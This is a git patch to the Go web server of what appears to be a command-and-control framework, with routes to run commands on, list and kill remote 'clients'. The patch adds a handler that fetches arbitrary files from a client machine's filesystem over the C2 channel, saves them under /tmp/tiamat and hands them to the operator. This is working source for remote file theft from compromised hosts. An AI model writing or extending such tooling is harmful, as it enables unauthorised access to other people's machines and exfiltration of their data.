From a0e4e5f12d21bae1a96fcb893b2a94b1a2c8a9d7 Mon Sep 17 00:00:00 2001 From: raul Date: Tue, 18 Jun 2024 12:20:45 +0200 Subject: [PATCH] Allow users to download files from a client's filesystem --- cmd/httpServer.go | 35 +++++++++++++++++++++++++++++------ 1 file changed, 29 insertions(+), 6 deletions(-) diff --git a/cmd/httpServer.go b/cmd/httpServer.go index 1dcff90..6b2a9b3 100644 --- a/cmd/httpServer.go +++ b/cmd/httpServer.go @@ -39,7 +39,7 @@ func WebServer() { r.GET("/fs/:clientid", getFilesystem) r.POST("/ls/:clientid", listFiles) r.POST("/upload/:clientid", uploadFile) - r.GET("/download/:clientid", downloadFile) + r.GET("/download/:clientid/:file", downloadFile) r.POST("/command/:clientid", execCMD) r.POST("/kill/:clientid", sendKillswitch) r.GET("/dump", dumpClients) @@ -53,9 +53,32 @@ func WebServer() { } func downloadFile(c *gin.Context) { - // path, _ := c.GetPostForm("fileToDownload") - // - // c.FileAttachment("", "") + client, err := clientCheck(c) + if err != nil { + return + } + + file := c.Param("file") + if file == "" { + return + } + path := strings.Replace(file, "_|_", "/", -1) + + resp, err := downloadFileC2(client, path) + if err != nil { + e := fmt.Sprintf("Error happened executing command: %v\n", err) + c.String(http.StatusOK, e) + return + } + if resp.Successful != true { + e := fmt.Sprintf("Error happened executing command: %v\n", resp.Message) + c.String(http.StatusOK, e) + return + } + + os.WriteFile("/tmp/tiamat/"+resp.FileName, resp.FileContents, 0700) + + c.FileAttachment("/tmp/tiamat/"+resp.FileName, resp.FileName) } func clientCheck(c *gin.Context) (Client, error) { @@ -161,8 +184,8 @@ func listFiles(c *gin.Context) { client.ClientID, v.FullPath, v.Name) list += entry } else { - entry := fmt.Sprintf("%v
", - client.ClientID, v.FullPath+v.Name, v.Name) + entry := fmt.Sprintf("%v
", + client.ClientID, strings.Replace(v.FullPath, "/", "_|_", -1), v.Name) list += entry } }